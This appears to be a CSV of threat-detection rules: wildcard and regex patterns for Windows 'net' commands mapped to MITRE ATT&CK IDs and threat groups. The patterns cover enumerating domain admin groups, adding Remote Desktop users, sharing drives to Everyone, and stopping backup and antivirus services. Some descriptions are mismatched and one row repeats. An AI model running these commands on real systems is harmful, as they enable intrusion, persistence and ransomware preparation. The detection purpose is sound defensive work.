"*net group *Domain Controllers*/domain*",".{0,1000}net\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\/domain.{0,1000}","greyware_tool_keyword","net","Query Domain Comtrollers Computers in the current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*net group *Enterprise Admins* /domain*",".{0,1000}net\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group *Exchange Trusted Subsystem* /domain*",".{0,1000}net\sgroup\s.{0,1000}Exchange\sTrusted\sSubsystem.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group *Microsoft Exchange Servers* /domain*",".{0,1000}net\sgroup\s.{0,1000}Microsoft\sExchange\sServers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group *Print Operators* /domain*",".{0,1000}net\sgroup\s.{0,1000}Print\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group *Schema Admins* /domain*",".{0,1000}net\sgroup\s.{0,1000}Schema\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group *Server Operators* /domain*",".{0,1000}net\sgroup\s.{0,1000}Server\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*net group /domain *Domain Admins*",".{0,1000}net\sgroup\s\/domain\s.{0,1000}Domain\sAdmins.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*net group administrators /domain*",".{0,1000}net\sgroup\sadministrators\s\/domain.{0,1000}","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*net localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net localgroup *Backup Operators*",".{0,1000}net\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net localgroup admin*",".{0,1000}net\slocalgroup\sadmin.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net share c=c:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sc\=c\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share d=d:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sd\=d\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share e=e:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\se\=e\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share e=e:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\se\=e\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share f=f:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sf\=f\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share g=g:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sg\=g\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share h=h:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sh\=h\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share i=i:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\si\=i\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share j=j:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sj\=j\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net share k=k:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sk\=k\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop ""IBM Domino Diagnostics (CProgramFilesIBMDomino)""*",".{0,1000}net\sstop\s\""IBM\sDomino\sDiagnostics\s\(CProgramFilesIBMDomino\)\"".{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop ""IBM Domino Server (CProgramFilesIBMDominodata)""*",".{0,1000}net\sstop\s\""IBM\sDomino\sServer\s\(CProgramFilesIBMDominodata\)\"".{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop ""Simply Accounting Database Connection Manager""*",".{0,1000}net\sstop\s\""Simply\sAccounting\sDatabase\sConnection\sManager\"".{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop ""Sophos *",".{0,1000}net\sstop\s\""Sophos\s.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ""SQL Backups""*",".{0,1000}net\sstop\s\""SQL\sBackups\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ""SQLsafe Backup Service""*",".{0,1000}net\sstop\s\""SQLsafe\sBackup\sService\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ""storagecraft imagemanager*""",".{0,1000}net\sstop\s\""storagecraft\simagemanager.{0,1000}\""","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ""Symantec System Recovery""*",".{0,1000}net\sstop\s\""Symantec\sSystem\sRecovery\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ""Veeam Backup Catalog Data Service""*",".{0,1000}net\sstop\s\""Veeam\sBackup\sCatalog\sData\sService\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ""Zoolz 2 Service""*",".{0,1000}net\sstop\s\""Zoolz\s2\sService\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop acronisagent*",".{0,1000}net\sstop\sacronisagent.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop AcronisAgent*",".{0,1000}net\sstop\sAcronisAgent.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop acrsch2svc*",".{0,1000}net\sstop\sacrsch2svc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop AcrSch2Svc*",".{0,1000}net\sstop\sAcrSch2Svc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop agntsvc*",".{0,1000}net\sstop\sagntsvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
